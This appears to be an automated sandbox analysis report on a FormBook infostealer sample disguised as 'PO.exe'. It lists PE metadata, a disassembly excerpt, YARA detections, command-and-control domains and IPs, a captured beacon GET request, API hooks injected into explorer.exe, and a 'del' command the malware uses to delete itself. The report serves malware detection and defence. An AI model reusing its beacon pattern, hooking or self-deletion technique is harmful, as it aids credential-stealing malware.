                                          SHA-512:939213666AA71DBE3EF9D747216A0BC959E11151AA56CFDE7CEECE6BE5EE13BBC3488F34259D6824D4B7126907A616CC172864840707619FF91B271B093C59CC
                                          Malicious:false
                                          Reputation:low
                                          Preview: MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....n`...........!.........................................................`............@.......................... ..U....!.......@.......................P..L..." ..............................................$"...............................text...\........................... ..`.rdata....... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc..L....P......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          Static File Info

                                          General

                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                          Entropy (8bit):7.919251123380622
                                          TrID:
                                          • Win32 Executable (generic) a (10002005/4) 92.16%
                                          • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                          • DOS Executable Generic (2002/1) 0.02%
                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                          File name:PO.exe
                                          File size:227498
                                          MD5:ba83b33d39ca6c3bf1f311d1b6a38d1a
                                          SHA1:ce0bcbb882b1a2105138b9955c1d892e4c6f0947
                                          SHA256:ce27bdaa30fc5a712b41888b529f52c87f90b9d196b975d47ec9b5236b48cebc
                                          SHA512:e251a936be79eed23d04874324be745090919af5ab7ee95310c06d8877f943fadc9752c38db70a5f0e7d3799e4f89f471233c96d18b92c12dab9bf78f59d2b13
                                          SSDEEP:3072:HyewmN4skJ6MWjfhva0w76JwhEkYZNjdYCSGAJG3RQ4UzWdP7NmQfey45grprDHO:HdrfhvaR6JxBZNxFSGScP7NloKFHRTs
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d.H............,...........:...!........&......e.......Rich....................PE..L.....8E.................Z....9.....J1.....

                                          File Icon

                                          Icon Hash:b2a88c96b2ca6a72

                                          Static PE Info

                                          General

                                          Entrypoint:0x40314a
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                          DLL Characteristics:
                                          Time Stamp:0x4538CD0B [Fri Oct 20 13:20:11 2006 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:18bc6fa81e19f21156316b1ae696ed6b

                                          Entrypoint Preview

                                          Instruction
                                          sub esp, 0000017Ch
                                          push ebx
                                          push ebp
                                          push esi
                                          xor esi, esi
                                          push edi
                                          mov dword ptr [esp+18h], esi
                                          mov ebp, 00409240h
                                          mov byte ptr [esp+10h], 00000020h
                                          call dword ptr [00407030h]
                                          push esi
                                          call dword ptr [00407270h]
                                          mov dword ptr [007A3030h], eax
                                          push esi
                                          lea eax, dword ptr [esp+30h]
                                          push 00000160h
                                          push eax
                                          push esi
                                          push 0079E540h
                                          call dword ptr [00407158h]
                                          push 00409230h
                                          push 007A2780h
                                          call 00007FB80CD18308h
                                          mov ebx, 007AA400h
                                          push ebx
                                          push 00000400h
                                          call dword ptr [004070B4h]
                                          call 00007FB80CD15A49h
                                          test eax, eax
                                          jne 00007FB80CD15B06h
                                          push 000003FBh
                                          push ebx
                                          call dword ptr [004070B0h]
                                          push 00409228h
                                          push ebx
                                          call 00007FB80CD182F3h
                                          call 00007FB80CD15A29h
                                          test eax, eax
                                          je 00007FB80CD15C22h
                                          mov edi, 007A9000h
                                          push edi
                                          call dword ptr [00407140h]
                                          call dword ptr [004070ACh]
                                          push eax
                                          push edi
                                          call 00007FB80CD182B1h
                                          push 00000000h
                                          call dword ptr [00407108h]
                                          cmp byte ptr [007A9000h], 00000022h
                                          mov dword ptr [007A2F80h], eax
                                          mov eax, edi
                                          jne 00007FB80CD15AECh
                                          mov byte ptr [esp+10h], 00000022h
                                          mov eax, 00000001h

                                          Rich Headers

                                          Programming Language:
                                          • [EXP] VC++ 6.0 SP5 build 8804

                                          Data Directories

                                          NameVirtual AddressVirtual Size Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x73440xb4.rdata
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x3ac0000x900.rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IAT0x70000x280.rdata
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                          Sections

                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                          .text0x10000x59de0x5a00False0.681293402778data6.5143386598IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                          .rdata0x70000x10f20x1200False0.430338541667data5.0554281206IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .data0x90000x39a0340x400unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                          .ndata0x3a40000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .rsrc0x3ac0000x9000xa00False0.409375data3.94574916515IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                          Resources

                                          NameRVASizeTypeLanguageCountry
                                          RT_ICON0x3ac1900x2e8dataEnglishUnited States
                                          RT_DIALOG0x3ac4780x100dataEnglishUnited States
                                          RT_DIALOG0x3ac5780x11cdataEnglishUnited States
                                          RT_DIALOG0x3ac6980x60dataEnglishUnited States
                                          RT_GROUP_ICON0x3ac6f80x14dataEnglishUnited States
                                          RT_MANIFEST0x3ac7100x1ebXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                          Imports

                                          DLLImport
                                          KERNEL32.dllCloseHandle, SetFileTime, CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetFileSize, GetModuleFileNameA, GetTickCount, GetCurrentProcess, lstrcmpiA, ExitProcess, GetCommandLineA, GetWindowsDirectoryA, GetTempPathA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, lstrcmpA, GetEnvironmentVariableA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, SetErrorMode, GetModuleHandleA, LoadLibraryA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, CopyFileA
                                          USER32.dllScreenToClient, GetWindowRect, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, EndDialog, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxA, CharPrevA, DispatchMessageA, PeekMessageA, CreateDialogParamA, DestroyWindow, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, TrackPopupMenu, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                                          GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                                          SHELL32.dllSHGetMalloc, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                                          ADVAPI32.dllRegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                                          COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                          ole32.dllOleInitialize, OleUninitialize, CoCreateInstance
                                          VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                                          Possible Origin

                                          Language of compilation systemCountry where language is spokenMap
                                          EnglishUnited States

                                          Network Behavior

                                          Snort IDS Alerts

                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                          04/08/21-12:14:02.069664TCP2031453ET TROJAN FormBook CnC Checkin (GET)4972780192.168.2.5162.241.24.122
                                          04/08/21-12:14:02.069664TCP2031449ET TROJAN FormBook CnC Checkin (GET)4972780192.168.2.5162.241.24.122
                                          04/08/21-12:14:02.069664TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972780192.168.2.5162.241.24.122

                                          Network Port Distribution

                                          TCP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Apr 8, 2021 12:13:40.544469118 CEST4972580192.168.2.5199.247.6.20
                                          Apr 8, 2021 12:13:40.562431097 CEST8049725199.247.6.20192.168.2.5
                                          Apr 8, 2021 12:13:41.064224005 CEST4972580192.168.2.5199.247.6.20
                                          Apr 8, 2021 12:13:41.082194090 CEST8049725199.247.6.20192.168.2.5
                                          Apr 8, 2021 12:13:41.595515013 CEST4972580192.168.2.5199.247.6.20
                                          Apr 8, 2021 12:13:41.613816023 CEST8049725199.247.6.20192.168.2.5
                                          Apr 8, 2021 12:14:01.927160978 CEST4972780192.168.2.5162.241.24.122
                                          Apr 8, 2021 12:14:02.069130898 CEST8049727162.241.24.122192.168.2.5
                                          Apr 8, 2021 12:14:02.069335938 CEST4972780192.168.2.5162.241.24.122
                                          Apr 8, 2021 12:14:02.069664001 CEST4972780192.168.2.5162.241.24.122
                                          Apr 8, 2021 12:14:02.211385965 CEST8049727162.241.24.122192.168.2.5
                                          Apr 8, 2021 12:14:02.566215038 CEST4972780192.168.2.5162.241.24.122
                                          Apr 8, 2021 12:14:02.752856016 CEST8049727162.241.24.122192.168.2.5
                                          Apr 8, 2021 12:14:04.872277021 CEST8049727162.241.24.122192.168.2.5
                                          Apr 8, 2021 12:14:04.872505903 CEST4972780192.168.2.5162.241.24.122
                                          Apr 8, 2021 12:14:04.872608900 CEST8049727162.241.24.122192.168.2.5
                                          Apr 8, 2021 12:14:04.872714996 CEST4972780192.168.2.5162.241.24.122

                                          UDP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Apr 8, 2021 12:12:06.178884983 CEST6434453192.168.2.58.8.8.8
                                          Apr 8, 2021 12:12:06.191783905 CEST53643448.8.8.8192.168.2.5
                                          Apr 8, 2021 12:12:08.048573971 CEST6206053192.168.2.58.8.8.8
                                          Apr 8, 2021 12:12:08.061793089 CEST53620608.8.8.8192.168.2.5
                                          Apr 8, 2021 12:12:08.770917892 CEST6180553192.168.2.58.8.8.8
                                          Apr 8, 2021 12:12:08.783648968 CEST53618058.8.8.8192.168.2.5
                                          Apr 8, 2021 12:12:08.987853050 CEST5479553192.168.2.58.8.8.8
                                          Apr 8, 2021 12:12:09.006052971 CEST53547958.8.8.8192.168.2.5
                                          Apr 8, 2021 12:12:10.268135071 CEST4955753192.168.2.58.8.8.8
                                          Apr 8, 2021 12:12:10.281533957 CEST53495578.8.8.8192.168.2.5
                                          Apr 8, 2021 12:12:11.804956913 CEST6173353192.168.2.58.8.8.8
                                          Apr 8, 2021 12:12:11.817466021 CEST53617338.8.8.8192.168.2.5
                                          Apr 8, 2021 12:12:12.743650913 CEST6544753192.168.2.58.8.8.8
                                          Apr 8, 2021 12:12:12.756333113 CEST53654478.8.8.8192.168.2.5
                                          Apr 8, 2021 12:12:13.563091040 CEST5244153192.168.2.58.8.8.8
                                          Apr 8, 2021 12:12:13.575824022 CEST53524418.8.8.8192.168.2.5
                                          Apr 8, 2021 12:12:14.841455936 CEST6217653192.168.2.58.8.8.8
                                          Apr 8, 2021 12:12:14.853894949 CEST53621768.8.8.8192.168.2.5
                                          Apr 8, 2021 12:12:15.754436970 CEST5959653192.168.2.58.8.8.8
                                          Apr 8, 2021 12:12:15.767277956 CEST53595968.8.8.8192.168.2.5
                                          Apr 8, 2021 12:12:17.557957888 CEST6529653192.168.2.58.8.8.8
                                          Apr 8, 2021 12:12:17.571839094 CEST53652968.8.8.8192.168.2.5
                                          Apr 8, 2021 12:12:21.269838095 CEST6318353192.168.2.58.8.8.8
                                          Apr 8, 2021 12:12:21.282497883 CEST53631838.8.8.8192.168.2.5
                                          Apr 8, 2021 12:12:32.977138996 CEST6015153192.168.2.58.8.8.8
                                          Apr 8, 2021 12:12:32.995311975 CEST53601518.8.8.8192.168.2.5
                                          Apr 8, 2021 12:12:52.821908951 CEST5696953192.168.2.58.8.8.8
                                          Apr 8, 2021 12:12:52.835186958 CEST53569698.8.8.8192.168.2.5
                                          Apr 8, 2021 12:13:01.819839954 CEST5516153192.168.2.58.8.8.8
                                          Apr 8, 2021 12:13:01.838418007 CEST53551618.8.8.8192.168.2.5
                                          Apr 8, 2021 12:13:04.264900923 CEST5475753192.168.2.58.8.8.8
                                          Apr 8, 2021 12:13:04.286134005 CEST53547578.8.8.8192.168.2.5
                                          Apr 8, 2021 12:13:20.221487999 CEST4999253192.168.2.58.8.8.8
                                          Apr 8, 2021 12:13:20.282555103 CEST53499928.8.8.8192.168.2.5
                                          Apr 8, 2021 12:13:30.721555948 CEST6007553192.168.2.58.8.8.8
                                          Apr 8, 2021 12:13:30.733474970 CEST53600758.8.8.8192.168.2.5
                                          Apr 8, 2021 12:13:33.983861923 CEST5501653192.168.2.58.8.8.8
                                          Apr 8, 2021 12:13:33.997242928 CEST53550168.8.8.8192.168.2.5
                                          Apr 8, 2021 12:13:40.495008945 CEST6434553192.168.2.58.8.8.8
                                          Apr 8, 2021 12:13:40.540290117 CEST53643458.8.8.8192.168.2.5
                                          Apr 8, 2021 12:13:53.829301119 CEST5712853192.168.2.58.8.8.8
                                          Apr 8, 2021 12:13:53.862998009 CEST53571288.8.8.8192.168.2.5
                                          Apr 8, 2021 12:14:01.800262928 CEST5479153192.168.2.58.8.8.8
                                          Apr 8, 2021 12:14:01.924691916 CEST53547918.8.8.8192.168.2.5
                                          Apr 8, 2021 12:14:15.857790947 CEST5046353192.168.2.58.8.8.8
                                          Apr 8, 2021 12:14:15.872793913 CEST53504638.8.8.8192.168.2.5
                                          Apr 8, 2021 12:14:17.984936953 CEST5039453192.168.2.58.8.8.8
                                          Apr 8, 2021 12:14:18.019665003 CEST53503948.8.8.8192.168.2.5
                                          Apr 8, 2021 12:14:22.730901957 CEST5853053192.168.2.58.8.8.8
                                          Apr 8, 2021 12:14:22.908416986 CEST53585308.8.8.8192.168.2.5

                                          DNS Queries

                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                          Apr 8, 2021 12:13:20.221487999 CEST192.168.2.58.8.8.80xef65Standard query (0)www.ayescarrental.comA (IP address)IN (0x0001)
                                          Apr 8, 2021 12:13:40.495008945 CEST192.168.2.58.8.8.80x4eaeStandard query (0)www.deerokoj.comA (IP address)IN (0x0001)
                                          Apr 8, 2021 12:14:01.800262928 CEST192.168.2.58.8.8.80x4e12Standard query (0)www.riceandginger.comA (IP address)IN (0x0001)
                                          Apr 8, 2021 12:14:22.730901957 CEST192.168.2.58.8.8.80x2515Standard query (0)www.665asilo.comA (IP address)IN (0x0001)

                                          DNS Answers

                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                          Apr 8, 2021 12:13:40.540290117 CEST8.8.8.8192.168.2.50x4eaeNo error (0)www.deerokoj.com199.247.6.20A (IP address)IN (0x0001)
                                          Apr 8, 2021 12:14:01.924691916 CEST8.8.8.8192.168.2.50x4e12No error (0)www.riceandginger.comriceandginger.comCNAME (Canonical name)IN (0x0001)
                                          Apr 8, 2021 12:14:01.924691916 CEST8.8.8.8192.168.2.50x4e12No error (0)riceandginger.com162.241.24.122A (IP address)IN (0x0001)
                                          Apr 8, 2021 12:14:22.908416986 CEST8.8.8.8192.168.2.50x2515No error (0)www.665asilo.comtour.tourbuzz.netCNAME (Canonical name)IN (0x0001)
                                          Apr 8, 2021 12:14:22.908416986 CEST8.8.8.8192.168.2.50x2515No error (0)tour.tourbuzz.nettourbuzz.netCNAME (Canonical name)IN (0x0001)
                                          Apr 8, 2021 12:14:22.908416986 CEST8.8.8.8192.168.2.50x2515No error (0)tourbuzz.net52.20.218.92A (IP address)IN (0x0001)

                                          HTTP Request Dependency Graph

                                          • www.riceandginger.com

                                          HTTP Packets

                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          0192.168.2.549727162.241.24.12280C:\Windows\explorer.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 8, 2021 12:14:02.069664001 CEST5414OUTGET /fcn/?8p4=IIapObjlcsmN/tTUXuiVJ6SvcAdYVsMSy0eMvzJ/vGgposGY5YkWehqMwppvssjWa3vK&sZCp=0btLwJX8eFdTeVr HTTP/1.1
                                          Host: www.riceandginger.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Apr 8, 2021 12:14:04.872277021 CEST5415INHTTP/1.1 301 Moved Permanently
                                          Date: Thu, 08 Apr 2021 10:14:04 GMT
                                          Server: nginx/1.19.5
                                          Content-Type: text/html; charset=UTF-8
                                          Content-Length: 0
                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                          X-Redirect-By: WordPress
                                          Location: http://riceandginger.com/fcn/?8p4=IIapObjlcsmN/tTUXuiVJ6SvcAdYVsMSy0eMvzJ/vGgposGY5YkWehqMwppvssjWa3vK&sZCp=0btLwJX8eFdTeVr
                                          host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
                                          X-Endurance-Cache-Level: 2
                                          X-Server-Cache: true
                                          X-Proxy-Cache: MISS


                                          Code Manipulations

                                          User Modules

                                          Hook Summary

                                          Function NameHook TypeActive in Processes
                                          PeekMessageAINLINEexplorer.exe
                                          PeekMessageWINLINEexplorer.exe
                                          GetMessageWINLINEexplorer.exe
                                          GetMessageAINLINEexplorer.exe

                                          Processes

                                          Process: explorer.exe, Module: user32.dll
                                          Function NameHook TypeNew Data
                                          PeekMessageAINLINE0x48 0x8B 0xB8 0x8A 0xAE 0xEF
                                          PeekMessageWINLINE0x48 0x8B 0xB8 0x82 0x2E 0xEF
                                          GetMessageWINLINE0x48 0x8B 0xB8 0x82 0x2E 0xEF
                                          GetMessageAINLINE0x48 0x8B 0xB8 0x8A 0xAE 0xEF

                                          Statistics

                                          Behavior

                                          Click to jump to process

                                          System Behavior

                                          Analysis Process: PO.exe PID: 5720 Parent PID: 5624

                                          General

                                          Start time:12:12:27
                                          Start date:08/04/2021
                                          Path:C:\Users\user\Desktop\PO.exe
                                          Wow64 process (32bit):true
                                          Commandline:'C:\Users\user\Desktop\PO.exe'
                                          Imagebase:0x400000
                                          File size:227498 bytes
                                          MD5 hash:BA83B33D39CA6C3BF1F311D1B6A38D1A
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.240240233.0000000002670000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.240240233.0000000002670000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.240240233.0000000002670000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:low

                                          Analysis Process: PO.exe PID: 2904 Parent PID: 5720

                                          General

                                          Start time:12:12:29
                                          Start date:08/04/2021
                                          Path:C:\Users\user\Desktop\PO.exe
                                          Wow64 process (32bit):true
                                          Commandline:'C:\Users\user\Desktop\PO.exe'
                                          Imagebase:0x400000
                                          File size:227498 bytes
                                          MD5 hash:BA83B33D39CA6C3BF1F311D1B6A38D1A
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.281309352.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.281309352.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.281309352.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.281955301.0000000000CF0000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.281955301.0000000000CF0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.281955301.0000000000CF0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.281979783.0000000000D20000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.281979783.0000000000D20000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.281979783.0000000000D20000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000001.235598141.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000001.235598141.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000001.235598141.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:low

                                          Analysis Process: explorer.exe PID: 3472 Parent PID: 2904

                                          General

                                          Start time:12:12:33
                                          Start date:08/04/2021
                                          Path:C:\Windows\explorer.exe
                                          Wow64 process (32bit):false
                                          Commandline:
                                          Imagebase:0x7ff693d90000
                                          File size:3933184 bytes
                                          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          Analysis Process: chkdsk.exe PID: 1716 Parent PID: 3472

                                          General

                                          Start time:12:12:50
                                          Start date:08/04/2021
                                          Path:C:\Windows\SysWOW64\chkdsk.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\chkdsk.exe
                                          Imagebase:0x7ff797770000
                                          File size:23040 bytes
                                          MD5 hash:2D5A2497CB57C374B3AE3080FF9186FB
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.495059747.0000000000200000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.495059747.0000000000200000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.495059747.0000000000200000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.496196901.0000000004B30000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.496196901.0000000004B30000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.496196901.0000000004B30000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:moderate

                                          Analysis Process: cmd.exe PID: 4500 Parent PID: 1716

                                          General

                                          Start time:12:12:54
                                          Start date:08/04/2021
                                          Path:C:\Windows\SysWOW64\cmd.exe
                                          Wow64 process (32bit):true
                                          Commandline:/c del 'C:\Users\user\Desktop\PO.exe'
                                          Imagebase:0x980000
                                          File size:232960 bytes
                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          Analysis Process: conhost.exe PID: 1260 Parent PID: 4500

                                          General

                                          Start time:12:12:55
                                          Start date:08/04/2021
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7ecfc0000
                                          File size:625664 bytes
                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          Disassembly

                                          Code Analysis

                                          Reset < >